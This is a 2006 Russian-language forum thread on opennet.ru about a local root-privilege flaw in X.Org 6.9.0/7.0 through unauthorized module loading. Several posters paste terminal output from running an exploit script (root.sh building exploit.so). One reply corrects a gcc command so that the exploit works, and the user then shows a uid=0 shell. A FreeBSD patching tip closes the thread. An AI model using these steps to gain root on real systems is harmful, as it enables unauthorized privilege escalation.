forum.opennet.ru - "OpenNews: Проблема безопасности в X.Org" (15)

форумы

помощь

поиск

регистрация

майллист

ВХОД

слежка

"OpenNews: Проблема безопасности в X.Org"

Форумы Разговоры, обсуждение новостей (Public)
Вариант для распечатки		Пред. тема \| След. тема
Изначальное сообщение		[Проследить за развитием треда]

"OpenNews: Проблема безопасности в X.Org"
Сообщение от opennews on 22-Мрт-06, 23:18
В последних версиях X11 сервера X.Org (X11R6.9.0 и X11R7.0) обнаружена (http://www.securityfocus.com/archive/1/archive/1/428183/100/0/threaded) возможность получения локальными пользователями "root" привилегий, через неавторизованную подгрузку модулей. X.Org версии 6.8.2 и более ранние проблеме не подвержены. URL: http://www.securityfocus.com/archive/1/archive/1/428183/100/0/threaded Новость: http://www.opennet.me/opennews/art.shtml?num=7181
Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх

Оглавление

Проблема безопасности в X.Org, Аноним, 23:18 , 22-Мрт-06, (1)
Проблема безопасности в X.Org, pavlinux, 00:11 , 23-Мрт-06, (2)
Проблема безопасности в X.Org, pavlinux, 00:14 , 23-Мрт-06, (3)
Проблема безопасности в X.Org, Abigor, 04:57 , 23-Мрт-06, (4)

Проблема безопасности в X.Org, гость, 08:28 , 23-Мрт-06, (5)

Проблема безопасности в X.Org, Abigor, 11:42 , 23-Мрт-06, (7)

Проблема безопасности в X.Org, Slayer605, 11:36 , 23-Мрт-06, (6)

Проблема безопасности в X.Org, dimus, 13:18 , 23-Мрт-06, (8)

Проблема безопасности в X.Org, Abigor, 04:01 , 24-Мрт-06, (9)

Проблема безопасности в X.Org, Moralez, 05:49 , 24-Мрт-06, (10)

Проблема безопасности в X.Org, Abigor, 09:37 , 24-Мрт-06, (11)

Проблема безопасности в X.Org, halt, 12:35 , 24-Мрт-06, (12)

Проблема безопасности в X.Org, Mikk, 18:32 , 26-Мрт-06, (15)

Проблема безопасности в X.Org, Abigor, 13:24 , 24-Мрт-06, (13)
Проблема безопасности в X.Org, Abigor, 13:13 , 25-Мрт-06, (14)

Сообщения по теме [Сортировка по времени, UBB]

1. "Проблема безопасности в X.Org"

Сообщение от Аноним on 22-Мрт-06, 23:18

У меня сработало ...
:)

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

2. "Проблема безопасности в X.Org"

Сообщение от pavlinux (??) on 23-Мрт-06, 00:11

Во задница, у меня тоже :)

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

3. "Проблема безопасности в X.Org"

Сообщение от pavlinux (??) on 23-Мрт-06, 00:14

shell # Xorg -version
X Window System Version 6.8.2
Release Date: 9 February 2005
X Protocol Version 11, Revision 0, Release 6.8.2
Build Operating System: SuSE Linux [ELF] SuSE
Current Operating System: Linux pavlinux 2.6.16 #4 SMP PREEMPT Mon Mar 20 20:16:16 MSK 2006 x86_64
Build Date: 18 March 2006
        Before reporting problems, check http://wiki.X.Org
        to make sure that you have the latest version.
Module Loader present

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

4. "Проблема безопасности в X.Org"

Сообщение от Abigor (??) on 23-Мрт-06, 04:57

[user@host xmodulepath]$ ./root.sh
/bin/rm -f   exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib  -o exploit.so
gcc: No input files specified
*** Error code 1
Stop in /usr/home/user/exploit/xmodulepath.
X Window System Version 6.9.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 6.9
Build Operating System: FreeBSD 5.4 i386 [ELF]
Current Operating System: FreeBSD lizard.is.isea.ru 5.4-RELEASE-p12 FreeBSD 5.4-RELEASE-p12 #0: Sat Mar  4 18:42:37 IRKT 2006     root@host:/usr/src/sys/i386/compile/KERN i386
Build Date: 15 February 2006
        Before reporting problems, check http://wiki.X.Org
        to make sure that you have the latest version.
Module Loader present
Markers: (--) probed, (**) from config file, (==) default setting,
        (++) from command line, (!!) notice, (II) informational,
        (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(==) Log file: "/var/log/Xorg.3.0.log", Time: Thu Mar 23 09:57:00 2006
(==) Using config file: "/etc/X11/xorg.conf"
(EE) Failed to load module "bitmap" (module does not exist, 0)
(EE) Failed to load module "pcidata" (module does not exist, 0)
Fatal server error:
Unable to load required base modules, Exiting...

Please consult the The X.Org Foundation support
         at http://wiki.X.Org
for help.
Please also check the log file at "/var/log/Xorg.3.0.log" for additional information.
./root.sh: ./shell: not found
А у меня не прокатило =)

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

5. "Проблема безопасности в X.Org"

Сообщение от гость on 23-Мрт-06, 08:28

>gcc -shared -nostdlib  -o exploit.so
замени на
gcc -shared -nostdlib exploit.o -o exploit.so
и попробуй снова.

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

7. "Проблема безопасности в X.Org"

Сообщение от Abigor (??) on 23-Мрт-06, 11:42

пасиб, сработало, и в папку /root зашел, так что бугу патчить
shell # id
uid=0(root) gid=1001(netuse) groups=1001(netuse)

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

6. "Проблема безопасности в X.Org"

Сообщение от Slayer605 on 23-Мрт-06, 11:36

shell# показывает но прав рута нет :)
serega@sunny ~/xmodulepath $ Xorg -version
X Window System Version 6.8.2
Release Date: 9 February 2005
X Protocol Version 11, Revision 0, Release 6.8.2
Build Operating System: Linux 2.4.31-sparc sparc64 [ELF]
Current Operating System: Linux sunny 2.4.31-sparc #6 Thu Dec 22 20:59:03 MSK 2005 sparc64
Build Date: 24 December 2005
        Before reporting problems, check http://wiki.X.Org
        to make sure that you have the latest version.
Module Loader present
serega@sunny ~/xmodulepath $ ./root.sh
/bin/rm -f   exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c
Unrecognized option: -modulepath
use: X [:<display>] [option]
-a #                   mouse acceleration (pixels)
-ac                    disable access control restrictions
-audit int             set audit trail level
........ пропущено .............
Fatal server error:
Unrecognized option: -modulepath

Please consult the The X.Org Foundation support
         at http://wiki.X.Org
for help.

[*] Executing shell with uid=1001 and euid=1001
shell # id
uid=1001(serega) gid=100(users) группы=100(users),18(audio),27(video)
shell # cd /root/
sh: cd: /root/: Permission denied

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

8. "Проблема безопасности в X.Org"

Сообщение от dimus (??) on 23-Мрт-06, 13:18

Хреново.
А многие люди жить без иксов не могут, и пихают их куда нипопадя. Вот будет таким наука.

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

9. "Проблема безопасности в X.Org"

Сообщение от Abigor (??) on 24-Мрт-06, 04:01

Мне в свое время, мой знакомый гугу сказал, что ни при каких условиях не ставь иксы на сервак, я тогда возмутился. но все равно принял есго слова и не ставил, теперь понимаю почиму он это мне сказал. =)

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

10. "Проблема безопасности в X.Org"

Сообщение от Moralez (??) on 24-Мрт-06, 05:49

дополню твоего гугу.... на сервер вообще не ставь ничего лишнего.

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

11. "Проблема безопасности в X.Org"

Сообщение от Abigor (??) on 24-Мрт-06, 09:37

заю, пасиб, минимум, только сервиси, и все =) ну еще только mc

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

12. "Проблема безопасности в X.Org"

Сообщение от halt (??) on 24-Мрт-06, 12:35

>Мне в свое время, мой знакомый гугу сказал, что ни при каких
>условиях не ставь иксы на сервак, я тогда возмутился. но все
>равно принял есго слова и не ставил, теперь понимаю почиму он
>это мне сказал. =)
А нафига на сервере иксы?

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

15. "Проблема безопасности в X.Org"

Сообщение от Mikk on 26-Мрт-06, 18:32

Потому что это X сервер )

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

13. "Проблема безопасности в X.Org"

Сообщение от Abigor (??) on 24-Мрт-06, 13:24

ну хотелось ребенку

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

14. "Проблема безопасности в X.Org"

Сообщение от Abigor (??) on 25-Мрт-06, 13:13

лечение , такое. обновить древо портов через cvsup потом сделать вот что
# cd /usr/ports
# make fetchindex
# portupgrade -rcvf xorg-server
и все, будет вам счастье =)

Правка | Высказать мнение | Ответить | Cообщить модератору | Наверх

Архив | Удалить

Индекс форумов | Темы | Пред. тема | След. тема

Оцените тред (1=ужас, 5=супер)? [ 1 | 2 | 3 | 4 | 5 ] [Рекомендовать для помещения в FAQ]

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "Проблема безопасности в X.Org"
Сообщение от Аноним on 22-Мрт-06, 23:18
У меня сработало ... :)
Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх

2. "Проблема безопасности в X.Org"
Сообщение от pavlinux (??) on 23-Мрт-06, 00:11
Во задница, у меня тоже :)
Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх

3. "Проблема безопасности в X.Org"
Сообщение от pavlinux (??) on 23-Мрт-06, 00:14
shell # Xorg -version X Window System Version 6.8.2 Release Date: 9 February 2005 X Protocol Version 11, Revision 0, Release 6.8.2 Build Operating System: SuSE Linux [ELF] SuSE Current Operating System: Linux pavlinux 2.6.16 #4 SMP PREEMPT Mon Mar 20 20:16:16 MSK 2006 x86_64 Build Date: 18 March 2006 Before reporting problems, check http://wiki.X.Org to make sure that you have the latest version. Module Loader present
Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх

4. "Проблема безопасности в X.Org"
Сообщение от Abigor (??) on 23-Мрт-06, 04:57
[user@host xmodulepath]$ ./root.sh /bin/rm -f exploit.o exploit.so shell .o .so gcc -fPIC -c exploit.c gcc -shared -nostdlib -o exploit.so gcc: No input files specified * Error code 1 Stop in /usr/home/user/exploit/xmodulepath. X Window System Version 6.9.0 Release Date: 21 December 2005 X Protocol Version 11, Revision 0, Release 6.9 Build Operating System: FreeBSD 5.4 i386 [ELF] Current Operating System: FreeBSD lizard.is.isea.ru 5.4-RELEASE-p12 FreeBSD 5.4-RELEASE-p12 #0: Sat Mar 4 18:42:37 IRKT 2006 root@host:/usr/src/sys/i386/compile/KERN i386 Build Date: 15 February 2006 Before reporting problems, check http://wiki.X.Org to make sure that you have the latest version. Module Loader present Markers: (--) probed, () from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. (==) Log file: "/var/log/Xorg.3.0.log", Time: Thu Mar 23 09:57:00 2006 (==) Using config file: "/etc/X11/xorg.conf" (EE) Failed to load module "bitmap" (module does not exist, 0) (EE) Failed to load module "pcidata" (module does not exist, 0) Fatal server error: Unable to load required base modules, Exiting... Please consult the The X.Org Foundation support at http://wiki.X.Org for help. Please also check the log file at "/var/log/Xorg.3.0.log" for additional information. ./root.sh: ./shell: not found А у меня не прокатило =)
Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх


	5. "Проблема безопасности в X.Org"
	Сообщение от гость on 23-Мрт-06, 08:28
	>gcc -shared -nostdlib -o exploit.so замени на gcc -shared -nostdlib exploit.o -o exploit.so и попробуй снова.
	Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх


	7. "Проблема безопасности в X.Org"
	Сообщение от Abigor (??) on 23-Мрт-06, 11:42
	пасиб, сработало, и в папку /root зашел, так что бугу патчить shell # id uid=0(root) gid=1001(netuse) groups=1001(netuse)
	Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх

6. "Проблема безопасности в X.Org"
Сообщение от Slayer605 on 23-Мрт-06, 11:36
shell# показывает но прав рута нет :) serega@sunny ~/xmodulepath $ Xorg -version X Window System Version 6.8.2 Release Date: 9 February 2005 X Protocol Version 11, Revision 0, Release 6.8.2 Build Operating System: Linux 2.4.31-sparc sparc64 [ELF] Current Operating System: Linux sunny 2.4.31-sparc #6 Thu Dec 22 20:59:03 MSK 2005 sparc64 Build Date: 24 December 2005 Before reporting problems, check http://wiki.X.Org to make sure that you have the latest version. Module Loader present serega@sunny ~/xmodulepath $ ./root.sh /bin/rm -f exploit.o exploit.so shell .o .so gcc -fPIC -c exploit.c gcc -shared -nostdlib exploit.o -o exploit.so gcc -o shell shell.c Unrecognized option: -modulepath use: X [:<display>] [option] -a # mouse acceleration (pixels) -ac disable access control restrictions -audit int set audit trail level ........ пропущено ............. Fatal server error: Unrecognized option: -modulepath Please consult the The X.Org Foundation support at http://wiki.X.Org for help. [*] Executing shell with uid=1001 and euid=1001 shell # id uid=1001(serega) gid=100(users) группы=100(users),18(audio),27(video) shell # cd /root/ sh: cd: /root/: Permission denied
Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх


	8. "Проблема безопасности в X.Org"
	Сообщение от dimus (??) on 23-Мрт-06, 13:18
	Хреново. А многие люди жить без иксов не могут, и пихают их куда нипопадя. Вот будет таким наука.
	Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх


	9. "Проблема безопасности в X.Org"
	Сообщение от Abigor (??) on 24-Мрт-06, 04:01
	Мне в свое время, мой знакомый гугу сказал, что ни при каких условиях не ставь иксы на сервак, я тогда возмутился. но все равно принял есго слова и не ставил, теперь понимаю почиму он это мне сказал. =)
	Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх


	10. "Проблема безопасности в X.Org"
	Сообщение от Moralez (??) on 24-Мрт-06, 05:49
	дополню твоего гугу.... на сервер вообще не ставь ничего лишнего.
	Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх


	11. "Проблема безопасности в X.Org"
	Сообщение от Abigor (??) on 24-Мрт-06, 09:37
	заю, пасиб, минимум, только сервиси, и все =) ну еще только mc
	Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх


	12. "Проблема безопасности в X.Org"
	Сообщение от halt (??) on 24-Мрт-06, 12:35
	>Мне в свое время, мой знакомый гугу сказал, что ни при каких >условиях не ставь иксы на сервак, я тогда возмутился. но все >равно принял есго слова и не ставил, теперь понимаю почиму он >это мне сказал. =) А нафига на сервере иксы?
	Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх


	15. "Проблема безопасности в X.Org"
	Сообщение от Mikk on 26-Мрт-06, 18:32
	Потому что это X сервер )
	Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх

13. "Проблема безопасности в X.Org"
Сообщение от Abigor (??) on 24-Мрт-06, 13:24
ну хотелось ребенку
Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх

14. "Проблема безопасности в X.Org"
Сообщение от Abigor (??) on 25-Мрт-06, 13:13
лечение , такое. обновить древо портов через cvsup потом сделать вот что # cd /usr/ports # make fetchindex # portupgrade -rcvf xorg-server и все, будет вам счастье =)
Правка \| Высказать мнение \| Ответить \| Cообщить модератору \| Наверх

Архив \| Удалить	Индекс форумов \| Темы \| Пред. тема \| След. тема
Оцените тред (1=ужас, 5=супер)? [ 1 \| 2 \| 3 \| 4 \| 5 ] [Рекомендовать для помещения в FAQ]